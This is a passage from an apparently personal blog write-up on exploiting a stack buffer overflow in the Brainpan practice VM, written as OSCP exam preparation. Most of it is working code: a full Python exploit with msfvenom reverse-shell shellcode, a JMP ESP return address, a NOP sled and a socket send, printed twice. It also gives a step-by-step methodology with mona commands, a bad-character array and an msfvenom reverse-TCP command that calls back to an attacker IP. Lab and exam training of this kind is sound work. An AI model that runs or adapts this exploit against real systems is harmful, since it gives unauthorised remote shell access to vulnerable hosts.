“\x52\x83\xc3\x04\x31\x73\x0e\x03\x02\xfe\xf6\x06\x18\x16\x74”
“\xe8\xe0\xe7\x19\x60\x05\xd6\x19\x16\x4e\x49\xaa\x5c\x02\x66”
“\x41\x30\xb6\xfd\x27\x9d\xb9\xb6\x82\xfb\xf4\x47\xbe\x38\x97”
“\xcb\xbd\x6c\x77\xf5\x0d\x61\x76\x32\x73\x88\x2a\xeb\xff\x3f”
“\xda\x98\x4a\xfc\x51\xd2\x5b\x84\x86\xa3\x5a\xa5\x19\xbf\x04”
“\x65\x98\x6c\x3d\x2c\x82\x71\x78\xe6\x39\x41\xf6\xf9\xeb\x9b”
“\xf7\x56\xd2\x13\x0a\xa6\x13\x93\xf5\xdd\x6d\xe7\x88\xe5\xaa”
“\x95\x56\x63\x28\x3d\x1c\xd3\x94\xbf\xf1\x82\x5f\xb3\xbe\xc1”
“\x07\xd0\x41\x05\x3c\xec\xca\xa8\x92\x64\x88\x8e\x36\x2c\x4a”
“\xae\x6f\x88\x3d\xcf\x6f\x73\xe1\x75\xe4\x9e\xf6\x07\xa7\xf6”
“\x3b\x2a\x57\x07\x54\x3d\x24\x35\xfb\x95\xa2\x75\x74\x30\x35”
“\x79\xaf\x84\xa9\x84\x50\xf5\xe0\x42\x04\xa5\x9a\x63\x25\x2e”
“\x5a\x8b\xf0\xe1\x0a\x23\xab\x41\xfa\x83\x1b\x2a\x10\x0c\x43”
“\x4a\x1b\xc6\xec\xe1\xe6\x81\xd2\x5e\xe9\xed\xbb\x9c\xe9\x1c”
“\x67\x28\x0f\x74\x87\x7c\x98\xe1\x3e\x25\x52\x93\xbf\xf3\x1f”
“\x93\x34\xf0\xe0\x5a\xbd\x7d\xf2\x0b\x4d\xc8\xa8\x9a\x52\xe6”
“\xc4\x41\xc0\x6d\x14\x0f\xf9\x39\x43\x58\xcf\x33\x01\x74\x76”
“\xea\x37\x85\xee\xd5\xf3\x52\xd3\xd8\xfa\x17\x6f\xff\xec\xe1”
“\x70\xbb\x58\xbe\x26\x15\x36\x78\x91\xd7\xe0\xd2\x4e\xbe\x64”
“\xa2\xbc\x01\xf2\xab\xe8\xf7\x1a\x1d\x45\x4e\x25\x92\x01\x46”
“\x5e\xce\xb1\xa9\xb5\x4a\xc1\xe3\x97\xfb\x4a\xaa\x42\xbe\x16”
“\x4d\xb9\xfd\x2e\xce\x4b\x7e\xd5\xce\x3e\x7b\x91\x48\xd3\xf1”
“\x8a\x3c\xd3\xa6\xab\x14”;

Now we need to add a nopsled. This is basically padding so the exploit works a little smoother. Nops are represented by “\x90” and usually anywhere from 10–20 works best.

You can add these in by just putting this in your buffer line “\x90” * 16

And my final exploit is as follows:

#!/usr/bin/python
import time, socket
shellcode = (“\xbe\x71\xf0\x14\xf3\xda\xdd\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1”
“\x52\x83\xc3\x04\x31\x73\x0e\x03\x02\xfe\xf6\x06\x18\x16\x74”
“\xe8\xe0\xe7\x19\x60\x05\xd6\x19\x16\x4e\x49\xaa\x5c\x02\x66”
“\x41\x30\xb6\xfd\x27\x9d\xb9\xb6\x82\xfb\xf4\x47\xbe\x38\x97”
“\xcb\xbd\x6c\x77\xf5\x0d\x61\x76\x32\x73\x88\x2a\xeb\xff\x3f”
“\xda\x98\x4a\xfc\x51\xd2\x5b\x84\x86\xa3\x5a\xa5\x19\xbf\x04”
“\x65\x98\x6c\x3d\x2c\x82\x71\x78\xe6\x39\x41\xf6\xf9\xeb\x9b”
“\xf7\x56\xd2\x13\x0a\xa6\x13\x93\xf5\xdd\x6d\xe7\x88\xe5\xaa”
“\x95\x56\x63\x28\x3d\x1c\xd3\x94\xbf\xf1\x82\x5f\xb3\xbe\xc1”
“\x07\xd0\x41\x05\x3c\xec\xca\xa8\x92\x64\x88\x8e\x36\x2c\x4a”
“\xae\x6f\x88\x3d\xcf\x6f\x73\xe1\x75\xe4\x9e\xf6\x07\xa7\xf6”
“\x3b\x2a\x57\x07\x54\x3d\x24\x35\xfb\x95\xa2\x75\x74\x30\x35”
“\x79\xaf\x84\xa9\x84\x50\xf5\xe0\x42\x04\xa5\x9a\x63\x25\x2e”
“\x5a\x8b\xf0\xe1\x0a\x23\xab\x41\xfa\x83\x1b\x2a\x10\x0c\x43”
“\x4a\x1b\xc6\xec\xe1\xe6\x81\xd2\x5e\xe9\xed\xbb\x9c\xe9\x1c”
“\x67\x28\x0f\x74\x87\x7c\x98\xe1\x3e\x25\x52\x93\xbf\xf3\x1f”
“\x93\x34\xf0\xe0\x5a\xbd\x7d\xf2\x0b\x4d\xc8\xa8\x9a\x52\xe6”
“\xc4\x41\xc0\x6d\x14\x0f\xf9\x39\x43\x58\xcf\x33\x01\x74\x76”
“\xea\x37\x85\xee\xd5\xf3\x52\xd3\xd8\xfa\x17\x6f\xff\xec\xe1”
“\x70\xbb\x58\xbe\x26\x15\x36\x78\x91\xd7\xe0\xd2\x4e\xbe\x64”
“\xa2\xbc\x01\xf2\xab\xe8\xf7\x1a\x1d\x45\x4e\x25\x92\x01\x46”
“\x5e\xce\xb1\xa9\xb5\x4a\xc1\xe3\x97\xfb\x4a\xaa\x42\xbe\x16”
“\x4d\xb9\xfd\x2e\xce\x4b\x7e\xd5\xce\x3e\x7b\x91\x48\xd3\xf1”
“\x8a\x3c\xd3\xa6\xab\x14”)

buffer= “A” * 524 + “\xf3\x12\x17\x31” + “\x90” * 16 + shellcode
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘192.168.1.243’,9999))
time.sleep(1)
s.send(buffer + “\r\n”);
s.close()

Let’s save our final exploit, set up a NetCat listener and see if we get a shell!

As you can see, after running the exploit we got our reverse shell. The program has some strange output, but has not crashed!

Time to run it on the actual VM. I change the IP in the code to the VM’s IP and run the buffer overflow exploit.

We got a reverse shell! Yeah! I’m not going through the rest of the VM because this was just a buffer overflow article. So, to wrap up, here is my BOF methodology for the OSCP exam. If you follow this, you will easily get the 25 point box.

BOF Strategy:

  1. ) Use a POC that is provided by OffSec or use the one from the course PDF. If you are practicing(MiniShare 1.4.1, SLmail,) more than likely there is a POC out there for you.
  2. Fuzz the app with your fuzzer to see how many bytes (roughly) will crash the app.
  3. Use the /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l “bytes” tool to help you get the pattern.
  4. Get the EIP offset using the /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q PATTERN tool to get the exact offset.
  5. Overwrite the EIP with “B”s as a proof of concept.
  6. Use !mona modules to find the unprotected module. This should be “False” across the board.
  7. Locate the JMP ESP return address using !mona find -s “\xff\xe4″ -m brainpan.exe (This will be the program you are trying to exploit, not brainpan.exe)
  8. Translate the return address. Example: 0x5f4a358f = “\x8f\x35\x4a\x5f”
  9. Find the bad characters with:

badchars = (“\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f”
“\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40”
“\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f”
“\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f”
“\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f”
“\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf”
“\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf”
“\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff”)

10. Add the bad characters to a list so you can exclude them from your shellcode.

11. Generate your shell code

Ex: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.148 LPORT=4443 EXITFUNC=thread -b “\x00\x0a\x0d” -a x86 -f c

12. Add in your nopsled.

13. Here is a proof of concept final exploit:

#!/usr/bin/python
import time, socket
shellcode = (“\xbe\x71\xf0\x14\xf3\xda\xdd\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1”
“\x52\x83\xc3\x04\x31\x73\x0e\x03\x02\xfe\xf6\x06\x18\x16\x74”
“\xe8\xe0\xe7\x19\x60\x05\xd6\x19\x16\x4e\x49\xaa\x5c\x02\x66”
“\x41\x30\xb6\xfd\x27\x9d\xb9\xb6\x82\xfb\xf4\x47\xbe\x38\x97”
“\xcb\xbd\x6c\x77\xf5\x0d\x61\x76\x32\x73\x88\x2a\xeb\xff\x3f”
“\xda\x98\x4a\xfc\x51\xd2\x5b\x84\x86\xa3\x5a\xa5\x19\xbf\x04”
“\x65\x98\x6c\x3d\x2c\x82\x71\x78\xe6\x39\x41\xf6\xf9\xeb\x9b”
“\xf7\x56\xd2\x13\x0a\xa6\x13\x93\xf5\xdd\x6d\xe7\x88\xe5\xaa”
“\x95\x56\x63\x28\x3d\x1c\xd3\x94\xbf\xf1\x82\x5f\xb3\xbe\xc1”
“\x07\xd0\x41\x05\x3c\xec\xca\xa8\x92\x64\x88\x8e\x36\x2c\x4a”
“\xae\x6f\x88\x3d\xcf\x6f\x73\xe1\x75\xe4\x9e\xf6\x07\xa7\xf6”
“\x3b\x2a\x57\x07\x54\x3d\x24\x35\xfb\x95\xa2\x75\x74\x30\x35”
“\x79\xaf\x84\xa9\x84\x50\xf5\xe0\x42\x04\xa5\x9a\x63\x25\x2e”
“\x5a\x8b\xf0\xe1\x0a\x23\xab\x41\xfa\x83\x1b\x2a\x10\x0c\x43”
“\x4a\x1b\xc6\xec\xe1\xe6\x81\xd2\x5e\xe9\xed\xbb\x9c\xe9\x1c”
“\x67\x28\x0f\x74\x87\x7c\x98\xe1\x3e\x25\x52\x93\xbf\xf3\x1f”
“\x93\x34\xf0\xe0\x5a\xbd\x7d\xf2\x0b\x4d\xc8\xa8\x9a\x52\xe6”
“\xc4\x41\xc0\x6d\x14\x0f\xf9\x39\x43\x58\xcf\x33\x01\x74\x76”
“\xea\x37\x85\xee\xd5\xf3\x52\xd3\xd8\xfa\x17\x6f\xff\xec\xe1”
“\x70\xbb\x58\xbe\x26\x15\x36\x78\x91\xd7\xe0\xd2\x4e\xbe\x64”
“\xa2\xbc\x01\xf2\xab\xe8\xf7\x1a\x1d\x45\x4e\x25\x92\x01\x46”
“\x5e\xce\xb1\xa9\xb5\x4a\xc1\xe3\x97\xfb\x4a\xaa\x42\xbe\x16”
“\x4d\xb9\xfd\x2e\xce\x4b\x7e\xd5\xce\x3e\x7b\x91\x48\xd3\xf1”
“\x8a\x3c\xd3\xa6\xab\x14”)

buffer= “A” * 524 + “\xf3\x12\x17\x31” + “\x90” * 16 + shellcode
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘192.168.1.243’,9999))
time.sleep(1)
s.send(buffer + “\r\n”);
s.close()

Well, that was a fun write-up. Hopefully, you learned something and aren’t too terrified of the BOF in your exam. If you enjoyed this let me know on Twitter @assume_breach

Until next time!

--

--

assume-breach
assume-breach

Written by assume-breach

Security enthusiast that loves a good CTF! OSCP, CRTO, RHCSA, MCSA.

No responses yet